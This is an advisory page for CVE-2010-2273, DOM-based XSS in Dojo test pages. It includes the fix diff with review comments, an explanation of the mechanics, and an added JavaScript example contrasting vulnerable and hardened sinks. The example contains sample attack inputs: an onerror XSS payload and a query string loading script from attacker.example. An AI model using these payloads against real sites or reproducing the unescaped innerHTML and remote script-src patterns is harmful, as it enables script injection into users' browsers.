CVE-2010-2273
Description
Multiple cross-site scripting (XSS) vulnerabilities in Dojo 1.0.x before 1.0.3, 1.1.x before 1.1.2, 1.2.x before 1.2.4, 1.3.x before 1.3.3, and 1.4.x before 1.4.2 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, possibly related to dojo/resources/iframe_history.html, dojox/av/FLAudio.js, dojox/av/FLVideo.js, dojox/av/resources/audio.swf, dojox/av/resources/video.swf, util/buildscripts/jslib/build.js, and util/buildscripts/jslib/buildUtil.js, as demonstrated by the (1) dojoUrl and (2) testUrl parameters to util/doh/runner.html.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package (ecosystem) | Affected versions | Patched versions |
|---|---|---|
| dojo (npm) | >= 1.13.0, < 1.13.1 | 1.13.1 |
| dojo (npm) | >= 1.12.0, < 1.12.4 | 1.12.4 |
| dojo (npm) | >= 1.11.0, < 1.11.6 | 1.11.6 |
| dojo (npm) | >= 1.10.0, < 1.10.10 | 1.10.10 |
Affected products
- cpe:2.3:a:dojotoolkit:dojo:1.0:*:*:*:*:*:*:*
- cpe:2.3:a:dojotoolkit:dojo:1.0.1:*:*:*:*:*:*:*
- cpe:2.3:a:dojotoolkit:dojo:1.0.2:*:*:*:*:*:*:*
- cpe:2.3:a:dojotoolkit:dojo:1.1:*:*:*:*:*:*:*
- cpe:2.3:a:dojotoolkit:dojo:1.1.1:*:*:*:*:*:*:*
- cpe:2.3:a:dojotoolkit:dojo:1.2:*:*:*:*:*:*:*
- cpe:2.3:a:dojotoolkit:dojo:1.2.1:*:*:*:*:*:*:*
- cpe:2.3:a:dojotoolkit:dojo:1.2.2:*:*:*:*:*:*:*
- cpe:2.3:a:dojotoolkit:dojo:1.2.3:*:*:*:*:*:*:*
- cpe:2.3:a:dojotoolkit:dojo:1.3:*:*:*:*:*:*:*
- cpe:2.3:a:dojotoolkit:dojo:1.3.1:*:*:*:*:*:*:*
- cpe:2.3:a:dojotoolkit:dojo:1.3.2:*:*:*:*:*:*:*
- cpe:2.3:a:dojotoolkit:dojo:1.4:*:*:*:*:*:*:*
- cpe:2.3:a:dojotoolkit:dojo:1.4.1:*:*:*:*:*:*:*
Patches
9117ffd5a386 Fix potential XSS vulnerability (#307)
3 files changed · +25 −39
testsDOH/_base/i18nExhaustive.js+1 −33 modified@@ -15,10 +15,6 @@ define([ "sync,,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built/i18nTest,amd", "sync,,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built-with-layers/i18nTest,amd", "sync,,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built-with-layers-and-preloads/i18nTest,amd", - "sync,,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,src,./i18n-test,amd", - "sync,,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built/i18nTest,amd", - "sync,,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built-with-layers/i18nTest,amd", - "sync,,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built-with-layers-and-preloads/i18nTest,amd", "sync,ab,src,./dojo,src,./i18n-test,legacy", "sync,ab,src,./dojo,legacy-built,./built-i18n-test/152-build,legacy", @@ -31,10 +27,6 @@ define([ "sync,ab,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built/i18nTest,amd", "sync,ab,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built-with-layers/i18nTest,amd", "sync,ab,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built-with-layers-and-preloads/i18nTest,amd", - "sync,ab,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,src,./i18n-test,amd", - "sync,ab,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built/i18nTest,amd", - "sync,ab,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built-with-layers/i18nTest,amd", - "sync,ab,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built-with-layers-and-preloads/i18nTest,amd", "sync,ab-cd,src,./dojo,src,./i18n-test,legacy", "sync,ab-cd,src,./dojo,legacy-built,./built-i18n-test/152-build,legacy", 
@@ -47,10 +39,6 @@ define([ "sync,ab-cd,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built/i18nTest,amd", "sync,ab-cd,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built-with-layers/i18nTest,amd", "sync,ab-cd,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built-with-layers-and-preloads/i18nTest,amd", - "sync,ab-cd,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,src,./i18n-test,amd", - "sync,ab-cd,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built/i18nTest,amd", - "sync,ab-cd,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built-with-layers/i18nTest,amd", - "sync,ab-cd,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built-with-layers-and-preloads/i18nTest,amd", "sync,ab-cd-ef,src,./dojo,src,./i18n-test,legacy", "sync,ab-cd-ef,src,./dojo,legacy-built,./built-i18n-test/152-build,legacy", @@ -63,10 +51,6 @@ define([ "sync,ab-cd-ef,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built/i18nTest,amd", "sync,ab-cd-ef,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built-with-layers/i18nTest,amd", "sync,ab-cd-ef,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built-with-layers-and-preloads/i18nTest,amd", - "sync,ab-cd-ef,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,src,./i18n-test,amd", - "sync,ab-cd-ef,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built/i18nTest,amd", - "sync,ab-cd-ef,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built-with-layers/i18nTest,amd", - "sync,ab-cd-ef,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built-with-layers-and-preloads/i18nTest,amd", "async,,src,./dojo,src,./i18n-test,amd", "async,,src,./dojo,built,./built-i18n-test/built/i18nTest,amd", "async,,src,./dojo,built,./built-i18n-test/built-with-layers/i18nTest,amd", 
@@ -75,10 +59,6 @@ define([ "async,,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built/i18nTest,amd", "async,,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built-with-layers/i18nTest,amd", "async,,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built-with-layers-and-preloads/i18nTest,amd", - "async,,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,src,./i18n-test,amd", - "async,,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built/i18nTest,amd", - "async,,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built-with-layers/i18nTest,amd", - "async,,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built-with-layers-and-preloads/i18nTest,amd", "async,ab,src,./dojo,src,./i18n-test,amd", "async,ab,src,./dojo,built,./built-i18n-test/built/i18nTest,amd", @@ -88,10 +68,6 @@ define([ "async,ab,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built/i18nTest,amd", "async,ab,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built-with-layers/i18nTest,amd", "async,ab,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built-with-layers-and-preloads/i18nTest,amd", - "async,ab,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,src,./i18n-test,amd", - "async,ab,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built/i18nTest,amd", - "async,ab,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built-with-layers/i18nTest,amd", - "async,ab,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built-with-layers-and-preloads/i18nTest,amd", "async,ab-cd,src,./dojo,src,./i18n-test,amd", "async,ab-cd,src,./dojo,built,./built-i18n-test/built/i18nTest,amd", 
@@ -101,10 +77,6 @@ define([ "async,ab-cd,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built/i18nTest,amd", "async,ab-cd,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built-with-layers/i18nTest,amd", "async,ab-cd,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built-with-layers-and-preloads/i18nTest,amd", - "async,ab-cd,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,src,./i18n-test,amd", - "async,ab-cd,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built/i18nTest,amd", - "async,ab-cd,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built-with-layers/i18nTest,amd", - "async,ab-cd,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built-with-layers-and-preloads/i18nTest,amd", "async,ab-cd-ef,src,./dojo,src,./i18n-test,amd", "async,ab-cd-ef,src,./dojo,built,./built-i18n-test/built/i18nTest,amd", 
@@ -113,11 +85,7 @@ define([ "async,ab-cd-ef,rel,./built-i18n-test/rel/dojo,src,./i18n-test,amd", "async,ab-cd-ef,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built/i18nTest,amd", "async,ab-cd-ef,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built-with-layers/i18nTest,amd", - "async,ab-cd-ef,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built-with-layers-and-preloads/i18nTest,amd", - "async,ab-cd-ef,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,src,./i18n-test,amd", - "async,ab-cd-ef,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built/i18nTest,amd", - "async,ab-cd-ef,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built-with-layers/i18nTest,amd", - "async,ab-cd-ef,cdn,http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo,built,./built-i18n-test/built-with-layers-and-preloads/i18nTest,amd"]; + "async,ab-cd-ef,rel,./built-i18n-test/rel/dojo,built,./built-i18n-test/built-with-layers-and-preloads/i18nTest,amd"]; for(var i = 0; i<testParams.length; i++){ doh.register("testsDOH._base.i18nExhaustive" + i, require.toUrl("dojo/main") + "/../../i18n-test/unit.html?" + testParams[i]);
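Review bot: the removed entries were the only `cdn`-type rows in the matrix, so after this change nothing in the exhaustive run exercises the loader path that handles a remote location; if that path is meant to stay supported, replace the hard-coded `http://192.168.1.114/dev/dtk/built-i18n-test/cdn/dojo` rows with a fixture served from the test host rather than deleting them outright. The `-`/`+` pair on the last `rel` entry only moves the `];` terminator onto it after the trailing `cdn` rows are gone, which is fine.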
testsDOH/_base/loader/i18n-exhaustive/i18n-test/unit.html+23 −5 modified@@ -1,4 +1,4 @@ -<html> +<!--<html> <head> <style type="text/css"> span.pass {background-color:green} @@ -12,6 +12,19 @@ //#1,,src,./dojo",src,./dtk-i18n-test (function(){ + var escapes = { + "&": "&", + "<": "<", + ">": ">", + "\"": """, + "'": "'" + }; + function escape(unsafe) { + return unsafe.replace(/[&<>"']/g, function (match) { + return escapes[match]; + }); + } + var hashInfo = location.search.substring(1), options = hashInfo.split(","); async = options[0]=="async" ? true : undefined, @@ -23,7 +36,11 @@ testId = "async: " + async + ", locale: " + locale + ", dojo: " + dojoType + ", i18nTest: " + i18nTestType + "(" + hashInfo + ")", testKind = options[6]; - document.getElementById("status").innerHTML += hashInfo; + if ((/^http/i).test(i18nTestLocation)) { + return; + } + + document.getElementById("status").innerHTML += escape(hashInfo); function report(result){ require(["doh"], function(doh){ @@ -39,7 +56,7 @@ }else{ text = "<span class='fail'>FAIL</span>: " + testId + "<br>" + result; } - document.getElementById("status").innerHTML = text; + document.getElementById("status").innerHTML = escape(text); } dojoConfig = { @@ -85,10 +102,11 @@ var node = document.createElement("script"); node.type = "text/javascript"; node.charset = "utf-8"; - node.src = (/^http/.test(dojoLocation) ? dojoLocation : "../" + dojoLocation) + "/dojo.js"; + // If a user passes a remote URL, force it to use the local dojo + node.src = ((/^http/i).test(dojoLocation) ? '../dojo' : "../" + dojoLocation) + "/dojo.js"; console.log(node.src); document.getElementsByTagName("head")[0].appendChild(node); })(); </script> </body> -</html> +</html>-->
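Review bot: as rendered here the `escapes` table maps every character to itself (`"&": "&"`, `"<": "<"`, `">": ">"`, and so on), which makes `escape()` a no-op. The intended values are the entity references (`&amp;`, `&lt;`, `&gt;`, `&quot;`, `&#39;`). If this is the diff viewer decoding entities on display, confirm the committed file really contains the entity forms; if it does not, `#status` is still written unescaped and the change is cosmetic.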
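Review bot: in the `report` hunk, `escape(text)` is applied after `text` has already been assembled as `"<span class='fail'>FAIL</span>: " + testId + "<br>" + result`, so the page's own `<span>` and `<br>` get encoded along with the untrusted parts and the `span.pass` / `span.fail` styling stops rendering. Escape `testId` and `result` individually before concatenation and leave the literal markup alone.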
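Review bot: the `if ((/^http/i).test(i18nTestLocation)) { return; }` hunk exits silently before anything is written to `#status`, so a rejected run shows an empty page with no indication why; write a fixed, non-reflected message first. It also behaves differently from the `dojoLocation` hunk, which substitutes a local default and carries on; the two checks should agree. And `/^http/i` only recognises absolute http(s) URLs: if `i18nTestLocation` is used anywhere without a fixed relative prefix (not visible in this diff), a protocol-relative `//host/path` would pass. An allow-list (relative path, no scheme, no leading `//`) is safer than matching one scheme.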
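Review bot: the new `node.src` line silently swaps a remote `dojoLocation` for `'../dojo'` and then runs the test anyway, so a malicious or mistyped URL yields a normal-looking result against the wrong loader. Refuse and report instead, as the `i18nTestLocation` branch does, so the two checks match. The retained `console.log(node.src)` now prints the substituted path rather than what was requested, which hides the substitution from whoever is debugging.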
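Review bot: wrapping the whole document in `<!--` / `-->` (first and last hunks) is the mitigation that actually ships; the escaping and the location checks are dead code until someone uncomments the page as test-instructions.md now asks, and from then on the hardened code is what runs. If the goal is to keep this page out of deployed copies of the toolkit, excluding it from the distribution build is a more durable fix than relying on comment markers that the next developer may remove.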
testsDOH/_base/loader/i18n-exhaustive/test-instructions.md+1 −1 modified@@ -59,6 +59,6 @@ The various built module and loaders are constructed by the v1.7 builder. The sh i18n-test/build-test-targets.sh accomplishes this task automatically. A unit test html page is constructed at i18n-test/unit.html. Given a query string, it will load a particular loader and -exercise a particular set of modules. +exercise a particular set of modules. Its contents must be uncommented before running the tests. Finally, the DOH test dojo/testsDOH/_base/i18nExhaustive runs all the various combinations.
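Review bot: the added sentence tells the reader to uncomment unit.html but not to re-comment or delete it afterwards, and the uncommented page is exactly the reflected-parameter surface this fix is for. Add the reverse step, and state why the file is shipped commented out, so the instruction is not read as a leftover to be "cleaned up".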
Vulnerability mechanics
The description covers DOM-based XSS in several Dojo test and build pages that reflect URL parameters into the page or use them as script locations (the advisory's demonstration is the dojoUrl and testUrl parameters of util/doh/runner.html). The fix commit shown above, 9117ffd (#307), patches one such page, testsDOH/_base/loader/i18n-exhaustive/i18n-test/unit.html, and its pre-patch lines show the pattern:
- the query string is read with `location.search.substring(1)` and split on commas into loader options;
- the raw query string is appended to `#status` with `innerHTML += hashInfo`, so any markup in the URL is parsed by the browser (DOM XSS, with no server-side reflection involved);
- one option, `dojoLocation`, is used as the base of a dynamically created `<script src>`, and a value starting with `http` is used verbatim, so a crafted link loads attacker-hosted JavaScript in the origin that serves the Dojo tree.
The patch entity-encodes what is written to `#status`, refuses an `http`-prefixed `i18nTestLocation`, substitutes the local loader for an `http`-prefixed `dojoLocation`, and comments out the whole page so it is inert unless a developer uncomments it to run the suite. Two version ranges appear on this page: the 2010 advisory (description and CPE list) covers 1.0.x to 1.4.x, while the npm ranges in the affected-packages table follow commit 9117ffd, which went into the 1.10 to 1.13 branches. The practical check for a deployment is whether any Dojo test, build or demo directory (`util/`, `tests/`, `testsDOH/`, `dojox/av/`) is reachable on a production web server; none of them is needed at runtime, and removing them closes every vector the description lists regardless of version.
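The two sinks in the patched test page, re-created as an added example so they can be run under Node without a DOM. This is not Dojo's code: the function names, the option order (read off the test parameters in i18nExhaustive.js) and the sample query strings are this example's own. The vulnerable forms reproduce what the pre-patch page did with `location.search`; the hardened forms escape only the untrusted text, so the page's own markup survives, and reject non-local loader locations by allow-list instead of matching one scheme.

```javascript
// Added example, not Dojo's own code. Pure functions, no DOM required.
//
// The page split location.search on commas into loader options. The order
// assumed here is taken from the test parameters in i18nExhaustive.js:
//   0 sync|async, 1 locale, 2 dojo type, 3 dojo location,
//   4 i18n-test type, 5 i18n-test location, 6 test kind
function parseOptions(queryString) {
  const hashInfo = queryString.replace(/^\?/, "");
  const o = hashInfo.split(",");
  return {
    hashInfo,
    async: o[0] === "async",
    locale: o[1] || "",
    dojoType: o[2] || "",
    dojoLocation: o[3] || "",
    i18nTestType: o[4] || "",
    i18nTestLocation: o[5] || "",
    testKind: o[6] || "",
  };
}

// Sink 1, pre-patch: the raw query string went straight into innerHTML.
function statusHtmlVulnerable(queryString) {
  return parseOptions(queryString).hashInfo;      // innerHTML += hashInfo
}

// Sink 2, pre-patch: an option beginning with "http" became a <script src>.
function loaderSrcVulnerable(queryString) {
  const loc = parseOptions(queryString).dojoLocation;
  return (/^http/.test(loc) ? loc : "../" + loc) + "/dojo.js";
}

// Hardened sink 1: entity-encode untrusted text, and only the untrusted
// text, so the page's own <span class='pass|fail'> wrapper keeps working.
const ENTITY = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (ch) => ENTITY[ch]);
}

function statusHtmlHardened(queryString, passed, testId, result) {
  const { hashInfo } = parseOptions(queryString);
  const label = passed ? "<span class='pass'>PASS</span>" : "<span class='fail'>FAIL</span>";
  return label + ": " + escapeHtml(testId) + "<br>" + escapeHtml(result) +
         " (" + escapeHtml(hashInfo) + ")";
}

// Hardened sink 2: allow-list a relative path. Any scheme (not just http),
// a protocol-relative "//host/path" and parent-directory traversal are all
// refused with an error rather than silently swapped for a default.
function isRemoteLocation(loc) {
  return /^[a-z][a-z0-9+.-]*:/i.test(loc) || loc.startsWith("//");
}

function loaderSrcHardened(queryString) {
  const loc = parseOptions(queryString).dojoLocation;
  if (loc === "" || isRemoteLocation(loc) || loc.split("/").includes("..")) {
    throw new Error("refusing non-local loader location: " + JSON.stringify(loc));
  }
  return "../" + loc + "/dojo.js";
}

// Constructed sample inputs: one row from the legitimate test matrix, one
// markup injection, one remote loader. Hostnames are placeholders.
const LEGIT = "?sync,ab,src,./dojo,src,./i18n-test,legacy";
const XSS = "?sync,,src,./dojo,src,./i18n-test,<img src=x onerror=alert(1)>";
const REMOTE = "?sync,,cdn,http://attacker.example/dojo,src,./i18n-test,amd";

console.log(statusHtmlVulnerable(XSS));                // markup reaches innerHTML
console.log(statusHtmlHardened(XSS, false, "t", "r")); // markup is inert text
console.log(loaderSrcVulnerable(REMOTE));              // attacker-hosted dojo.js
console.log(loaderSrcHardened(LEGIT));                 // local loader only
try { loaderSrcHardened(REMOTE); } catch (e) { console.log(e.message); }
```

The allow-list in `loaderSrcHardened` is deliberately stricter than the patch's `/^http/i` test: it does not matter how the value is later prefixed, because nothing with a scheme, a leading `//` or a `..` segment gets past it, and a rejected value produces an error the tester can see instead of a quiet substitution.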
References
- dojotoolkit.org/blog/post/dylan/2010/03/dojo-security-advisory/ (NVD: Patch, Vendor Advisory; GHSA)
- bugs.dojotoolkit.org/ticket/10773 (NVD: Exploit; GHSA)
- www.gdssecurity.com/l/b/2010/03/12/multiple-dom-based-xss-in-dojo-toolkit-sdk/ (NVD: Exploit; GHSA)
- secunia.com/advisories/38964 (NVD: Vendor Advisory)
- secunia.com/advisories/40007 (NVD: Vendor Advisory)
- www.vupen.com/english/advisories/2010/1281 (NVD: Vendor Advisory)
- github.com/advisories/GHSA-536q-8gxx-m782 (GHSA: Advisory)
- nvd.nist.gov/vuln/detail/CVE-2010-2273 (GHSA: Advisory)
- www-01.ibm.com/support/docview.wss (NVD; document identifier not preserved in this copy)
- www-1.ibm.com/support/docview.wss (NVD; listed seven times, document identifiers not preserved in this copy)
- github.com/dojo/dojo/commit/9117ffd5a3863e44c92fcd58564c0da22be858f4 (GHSA)
- github.com/dojo/dojo/pull/307 (GHSA)
- www.npmjs.com/advisories/972 (GHSA)